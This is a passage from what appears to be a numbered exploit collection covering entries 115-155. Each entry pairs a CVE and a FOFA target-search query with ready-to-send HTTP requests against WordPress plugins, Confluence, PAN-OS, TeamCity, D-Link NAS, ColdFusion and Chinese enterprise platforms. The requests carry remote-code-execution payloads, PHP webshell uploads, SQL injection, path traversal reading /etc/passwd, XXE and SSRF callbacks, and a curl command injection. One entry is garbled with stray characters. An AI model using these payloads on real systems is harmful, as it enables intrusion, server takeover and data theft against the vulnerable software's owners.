User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 back-end sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

% T8 o4 z) q% T/ _122. 北京百绰智能s200管理平台/importexport.php sql注入/ h6 A& P0 e$ U( _% e. s  S; ?; M
CVE-2024-27718FOFA:title="Smart管理平台"/ l& z8 V" h& e* f7 ~2 n  L
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
& ^" l# m& S6 C+ jGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
6 ]: C4 C7 D# r' nHost: x.x.x.x% \' J. V7 W  H; P8 C) z
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
  Y& K, B2 f7 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ Q4 w+ f+ O/ A" R. zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 y' ~7 O: f' p" J, g6 I+ k2 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* b: F. |& w' j6 k' y) d. f
Accept-Encoding: gzip, deflate, br
  A- H; d' h& T3 Z6 `Upgrade-Insecure-Requests: 1
* N9 l/ K' t. W. F3 q; vSec-Fetch-Dest: document
- z" y4 Q' Y% Y/ P8 X1 u! ?* sSec-Fetch-Mode: navigate9 i0 }$ U4 Z3 w+ s. m
Sec-Fetch-Site: none& q1 }, ]( Q( g9 B# T  }5 M2 Y
Sec-Fetch-User: ?1
" ]' R/ L( l  ?! XTe: trailers# s8 b6 S3 k( s7 }
Connection: close
0 w8 ]3 q9 F8 q4 v$ B
: E. K  k- Y6 E
123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat CORS SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command-and-dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
